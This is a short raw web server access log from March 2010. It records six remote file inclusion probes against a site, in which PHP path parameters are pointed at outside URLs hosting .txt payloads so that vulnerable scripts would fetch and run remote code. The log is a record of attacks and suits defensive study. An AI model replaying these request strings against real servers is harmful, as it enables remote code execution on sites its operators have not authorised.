122.201.102.68 - - [03/Mar/2010:09:36:53 -0800] "GET /index.php?option=com_jcalpro&mosConfig.absolute.path=http://mytwitterblog.info/robot.txt???? HTTP/1.1" 200 3642 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:37:07 -0800] "GET /logs/access_100224.log%20%20//include.php?path[docroot]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:37:07 -0800] "GET /include.php?path[docroot]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
58.150.99.144 - - [03/Mar/2010:09:37:07 -0800] "GET /logs//include.php?path[docroot]=http://www.ltwoong.pe.kr:8080////tmp/id2.txt? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:09:37:15 -0800] "GET //setup.php?dir=http://www.smrkbor.cz/cz/katalog/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
210.205.6.233 - - [03/Mar/2010:09:37:15 -0800] "GET /logs/access_100226.log%20%20///setup.php?dir=http://www.smrkbor.cz/cz/katalog/byz9991.txt?? HTTP/1.1" 404 5258 "-" "Mozilla/5.0" "www.puaga.com"
